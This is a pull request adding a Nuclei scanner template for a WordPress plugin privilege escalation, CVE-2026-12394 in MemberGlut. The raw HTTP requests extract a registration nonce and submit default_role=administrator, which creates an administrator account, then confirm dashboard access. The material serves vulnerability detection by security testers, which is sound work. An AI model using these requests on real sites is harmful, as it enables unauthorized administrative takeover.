### PR TITLE
Add CVE-2026-12394 MemberGlut WordPress role injection

### DIFF
--- a/http/cves/2026/CVE-2026-12394.yaml
+++ b/http/cves/2026/CVE-2026-12394.yaml
@@ -1,81 +1,78 @@
 id: CVE-2026-12394
 
 info:
-  name: MemberGlut < 1.1.5 - Unauthenticated Privilege Escalation via Registration Role
+  name: WordPress MemberGlut < 1.1.5 - Unauthenticated Privilege Escalation
   author: str4k3r
   severity: critical
   description: |
-    The MemberGlut - Role & User Management WordPress plugin registers a
-    front-end registration handler on `template_redirect` that is reachable
-    by unauthenticated visitors. `process_registration()` reads the
-    attacker-supplied `default_role` POST field and, prior to 1.1.5, passes
-    it straight to `WP_User::set_role()` after only `sanitize_text_field()`
-    with no allowlist check, so any unauthenticated visitor who can obtain a
-    valid `register_nonce` (rendered by the public `[memberglut_register_form]`
-    shortcode) can self-register an account with the `administrator` role,
-    resulting in full site compromise. The plugin also auto-logs the new
-    user in and returns WordPress auth cookies in the registration
-    response, so this template confirms admin-only dashboard access
-    (`/wp-admin/users.php`) immediately afterwards without any further
-    credentials. Fixed in 1.1.5 by validating `default_role` against a
-    fixed allowlist (`subscriber`, `memberglut_basic`, `memberglut_premium`,
-    `memberglut_vip`) before calling `set_role()`.
+    MemberGlut WordPress plugin < 1.1.5 contains a broken access control vulnerability caused by lack of validation of roles during front-end registration, letting unauthenticated users register with arbitrary roles including administrator, exploit requires no authentication.
+  impact: |
+    Unauthenticated users can register as administrators, leading to full site compromise.
+  remediation: |
+    Update to version 1.1.5 or later.
   reference:
     - https://wpscan.com/vulnerability/6b126a3e-30d5-4bed-ba47-33e589ec2852/
     - https://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.0/includes/class-memberglut-forms.php
     - https://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.5/includes/class-memberglut-forms.php
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-12394
   classification:
-    cve-id: CVE-2026-12394
-    cwe-id: CWE-269
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
+    cve-id: CVE-2026-12394
+    cwe-id: CWE-269
   metadata:
-    verified: true
     max-request: 3
+    verified: true
     vendor: memberglut
     product: memberglut
-  tags: cve,cve2026,wordpress,wp-plugin,memberglut,privesc,unauth,account-takeover
+    fofa-query: body="wp-content/plugins/memberglut"
+  tags: cve,cve2026,wordpress,wp-plugin,memberglut,privesc,unauth,wp
 
 variables:
-  page_id: ""
-  reg_user: "cve12394-{{randstr}}"
-  reg_pass: "Cve12394!{{randstr}}Aa1"
+  rand_user: "{{to_lower(rand_text_alpha(8))}}"
+
+flow: http(1) && http(2)
 
 http:
-  - cookie-reuse: true
-    raw:
+  - raw:
       - |
-        GET /?page_id={{page_id}} HTTP/1.1
+        GET /register/ HTTP/1.1
         Host: {{Hostname}}
 
-      - |
-        POST /?page_id={{page_id}} HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        action=memberglut_register&register_nonce={{register_nonce}}&username={{reg_user}}&email={{reg_user}}@example.test&password={{reg_pass}}&first_name=a&last_name=a&default_role=administrator
-
-      - |
-        GET /wp-admin/users.php HTTP/1.1
-        Host: {{Hostname}}
+    matchers:
+      - type: dsl
+        dsl:
+          - contains_all(body, "register_nonce", "memberglut_register")
+          - status_code == 200
+        condition: and
+        internal: true
 
     extractors:
       - type: regex
         name: register_nonce
         part: body
         group: 1
-        internal: true
         regex:
-          - 'name="register_nonce" value="([a-f0-9]+)"'
+          - 'name="register_nonce"\s*value="([a-f0-9]+)"'
+        internal: true
 
-    matchers-condition: and
+  - raw:
+      - |
+        POST /register/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=memberglut_register&register_nonce={{register_nonce}}&username={{rand_user}}&email={{rand_user}}@example.test&password=Cve12394Test1!&first_name=a&last_name=a&default_role=administrator
+
+      - |
+        GET /wp-admin/users.php HTTP/1.1
+        Host: {{Hostname}}
+
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - "Add New User"
-          - "<title>Users"
-        condition: or
+      - type: dsl
+        dsl:
+          - status_code_1 == 302
+          - contains(header_1, "registration_success")
+          - status_code_2 == 200
+          - contains_all(body_2, "wpbody-content", "Administrator")
+        condition: and

--- a/http/cves/2026/CVE-2026-12394.yaml
+++ b/http/cves/2026/CVE-2026-12394.yaml
@@ -1,0 +1,81 @@
+id: CVE-2026-12394
+
+info:
+  name: MemberGlut < 1.1.5 - Unauthenticated Privilege Escalation via Registration Role
+  author: str4k3r
+  severity: critical
+  description: |
+    The MemberGlut - Role & User Management WordPress plugin registers a
+    front-end registration handler on `template_redirect` that is reachable
+    by unauthenticated visitors. `process_registration()` reads the
+    attacker-supplied `default_role` POST field and, prior to 1.1.5, passes
+    it straight to `WP_User::set_role()` after only `sanitize_text_field()`
+    with no allowlist check, so any unauthenticated visitor who can obtain a
+    valid `register_nonce` (rendered by the public `[memberglut_register_form]`
+    shortcode) can self-register an account with the `administrator` role,
+    resulting in full site compromise. The plugin also auto-logs the new
+    user in and returns WordPress auth cookies in the registration
+    response, so this template confirms admin-only dashboard access
+    (`/wp-admin/users.php`) immediately afterwards without any further
+    credentials. Fixed in 1.1.5 by validating `default_role` against a
+    fixed allowlist (`subscriber`, `memberglut_basic`, `memberglut_premium`,
+    `memberglut_vip`) before calling `set_role()`.
+  reference:
+    - https://wpscan.com/vulnerability/6b126a3e-30d5-4bed-ba47-33e589ec2852/
+    - https://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.0/includes/class-memberglut-forms.php
+    - https://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.5/includes/class-memberglut-forms.php
+  classification:
+    cve-id: CVE-2026-12394
+    cwe-id: CWE-269
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: memberglut
+    product: memberglut
+  tags: cve,cve2026,wordpress,wp-plugin,memberglut,privesc,unauth,account-takeover
+
+variables:
+  page_id: ""
+  reg_user: "cve12394-{{randstr}}"
+  reg_pass: "Cve12394!{{randstr}}Aa1"
+
+http:
+  - cookie-reuse: true
+    raw:
+      - |
+        GET /?page_id={{page_id}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /?page_id={{page_id}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=memberglut_register&register_nonce={{register_nonce}}&username={{reg_user}}&email={{reg_user}}@example.test&password={{reg_pass}}&first_name=a&last_name=a&default_role=administrator
+
+      - |
+        GET /wp-admin/users.php HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: register_nonce
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'name="register_nonce" value="([a-f0-9]+)"'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "Add New User"
+          - "<title>Users"
+        condition: or


### PR DESCRIPTION
## Vulnerability
MemberGlut 1.1.0 passes the client-supplied `default_role` directly to `WP_User::set_role()` instead of enforcing the site’s allowed registration roles. The 1.1.5 release applies an allowlist.

## Template behavior
The template loads the public registration page, extracts its nonce, submits a registration request with `default_role=administrator`, and checks the users page for the resulting account. This follows the real registration flow rather than guessing from a banner.

## Required configuration
The target must expose a page containing `[memberglut_register_form]` with WordPress registration enabled. Set `page_id`, `reg_user`, and `reg_pass` to a disposable test account and page. The vulnerable flow creates an administrator account.

## Impact
A remote unauthenticated user can register with administrator privileges and take over the WordPress site.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-12394.yaml -var page_id=<page-id> -var reg_user=<disposable-user> -var reg_pass=<temporary-password>
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
